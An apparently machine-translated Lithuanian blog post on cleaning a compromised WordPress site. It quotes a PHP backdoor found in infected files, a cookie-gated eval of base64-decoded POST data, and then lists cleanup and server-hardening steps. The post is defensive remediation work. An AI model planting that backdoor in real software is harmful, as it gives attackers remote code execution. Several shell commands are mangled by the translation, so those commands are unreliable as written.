Prieš pradėdami skaityti šį pranešimą, jūs turėtumėte pamatyti rašyti čia, Suprasti kažką. :)
Radau jį keliuose tinklaraščio failuose stealthsettings.com, kodai, panašūs į žemiau esančius, kurie atsirado dėl viruso su žygdarbis WordPress.:
si
<?php if($_COOKIE[’44e827f9fbeca184′]==”5cd3c94b4b1c57ea”){ eval(base64_decode($_POST[‘file’])); exit; } ?>
Jei minėtas pasiūlymas yra apie failą xmlrpc.php nuo mieguistas, Tuo grep serverio, atrodo gana šio išeities kodus rūšies aikštelė.
Valymas užkrėstus failus:
Ooookkkk ...
1. Geriausias sprendimas, kaip tai daroma atsarginėsIr išvalyti duomenų bazė yra pašalinti failai WordPress (galite atidžiai patikrinę wp-config.php ir failus, kurie nėra griežtai susiję su wp platforma) serveryje ir įkelkite originalius iš versijos 2.5.1 (Šia proga ir padaryti versijos atnaujinimo wp :)) http://wordpress.org/download/ . Nuvalykite įskaitant teminių failus, jei jūs nepasitikite, kad jų kruopštaus patikrinimo.
Atrodo, turėjo įtakos ir failus į temas, kurios nebuvo panaudotos prieš į dienoraštį ir tiesiog pakeisti temą, neišsprendžia problemos.
./andreea/wp-content/themes/default/index.php:
2. Paieška ir pašalinti visus failus, kuriuose yra:.. *. _new.php, * _old.php, * Jpgg, * giff, * Pngg ir WP-info.txt byla, jeigu tokių yra.
rasti. vardas „* _new.php“
rasti. vardas „* _old.php“
rasti. vardas „* .jpgg“
rasti. vardas „* _giff“
rasti. vardas „* _pngg“
rasti. pavadinimas „wp-info.txt“
3. į / Tmp , Ieškokite ir ištrinkite aplankus, pavyzdžiui, tmpYwbzT2
SQL valymas :
1. lentelėje lentelėje wp_options Patikrinkite, ar ištrinti eilutes: internal_links_cache, rss_f541b3abd05e7962fcab37737f40fad8 si wordpress_options.
2. Viskas wp_options, eiti į active_plugins ir ištrinti, jei yra įjungti, kad baigiasi viena pratęsimų * _new.php, * _old.php, *. jpgg, *. giff, *. pngg arba jeigu kita pratęsimas įtariama, kruopščiai patikrinti.
3. Lentelėje wp_users, Pamatyti, jei yra vartotojas, kuris nėra parašęs nieko savo teise, stulpelis user_nicename. Ištrinkite šį vartotoją, bet atsiminkite numerį ID stulpelyje. Šis vartotojas greičiausiai naudos "WordPress"Ca user_login yra sukurta ir pasirodo 00: 00: 00 0000-00-00.
4. Eiti į lentelę wp_usermeta ir ištrinti visus geležinkelių linijose, priklausančiose ID aukščiau.
Atlikę šį SQL valymą, išjunkite ir įjunkite bet kokį papildinį. (tinklaraštyje -> informacijos suvestinė -> papildiniai)
Saugus serveris:
1. Žiūrėkite, kas katalogai ir failai "rašyti"(chmod 777) ir pabandykite įdėti a chmod kuri nebeleis jiems rašyti jokiu lygiu. (chmod 644, pavyzdžiui)
Ieškoti. -Permė-2-LS
2. Žiūrėkite, kas failai yra bitai suid arba SGID . Jei nenorite naudoti tie failai įdėti į jų chmod 0 arba pašalinti paketą, kuris jame yra. Jie yra labai pavojinga, nes jie atlikti privilegijas "grupėArba "šaknis"Ne su normaliomis vartotojo privilegijas vykdyti failą.
find /-type f-Perm-04000-LS
find /-type f-Perm-02000-LS
3. Patikrinkite, kaip uostai yra atviros ir bandykite uždaryti arba apsaugoti tuos, kurie nėra naudojami.
netstat-| grep-i klausytis
Tiek daug. Matau Kai kurie dienoraščiai draudžiama de Google Search o kiti sako "Jis padarė juos gerai!!!" . Na, aš būčiau tai padaręs už juos... bet ką tu pasakysi, jei Google pradės drausti visos svetainės formavimas IS šlamštą ir įdėti Trojos arklys (Trojan.Clicker.HTML) slapukuose?
1 mintis apieWordPress Išnaudoti – išvalykite virusų failus, SQL ir serverio saugumą.